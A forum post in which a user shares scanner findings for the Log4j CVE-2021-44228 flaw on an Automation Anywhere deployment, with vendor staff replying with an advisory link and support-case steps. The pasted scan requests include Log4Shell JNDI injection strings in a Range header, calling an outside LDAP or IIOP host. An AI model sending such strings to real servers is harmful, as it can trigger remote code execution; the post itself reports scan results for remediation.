Skip to main content
Question

Hello Team, We are facing Log4j Vulnerability issue on Automation Anywhere for existing java jar files, so need urgent support to analyse and resolve the issue in our environment.

  • April 27, 2022
  • 2 replies
  • 156 views
R

 

 

CVE ID

Port

Results

CVE-2021-44228

8081

Apache Log4j Remote Code Execution (RCE) Vulnerability (Zero-day) on 8081 port.

GET / HTTP/1.0

Host: cpcinchdv003851.cts.com:8081

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: */*

Range: ${jndi:ldap://10.238.51.15:42187/QUALYSTEST}#

CVE-2021-44228

443

Apache Log4j Remote Code Execution (RCE) Vulnerability (Zero-day) on 443 port.

GET / HTTP/1.0

Host: cpcinchdv003849.cts.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: */*

Range: ${jndi:ldap://10.238.51.15:36528/QUALYSTEST}#

CVE-2021-44228

81

Apache Log4j Remote Code Execution (RCE) Vulnerability (Zero-day) on 81 port.

GET / HTTP/1.0

Host: cpcinchdv003849.cts.com:81

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: */*

Range: ${jndi:iiop://10.238.51.15:36013/QUALYSTEST}#

    2 replies

    A
    Automation Anywhere Team
    Forum|alt.badge.img+12

    Hello @RAHUL BORADE​  Is it A360 OnPremise ? If yes, follow the article below.

     

    https://apeople.automationanywhere.com/s/article/A360-On-Premise-Update-regarding-CVE-2021-44228-related-to-0-day-in-the-Apache-Log4j2-Java-library

    A
    Automation Anywhere Team
    Forum|alt.badge.img+12

    @RAHUL BORADE​ :

     

    if you are still facing an issue then please create a support case

     

    How to create a support case :

    https://apeople.automationanywhere.com/s/article/How-to-create-a-support-case-in-service-cloud

     

    if you don't have access to the above link, email the AA Support team "apeopleopsteam@automationanywhere.com" to get access.

    Terms & ConditionsCookie settingsAccessibility statement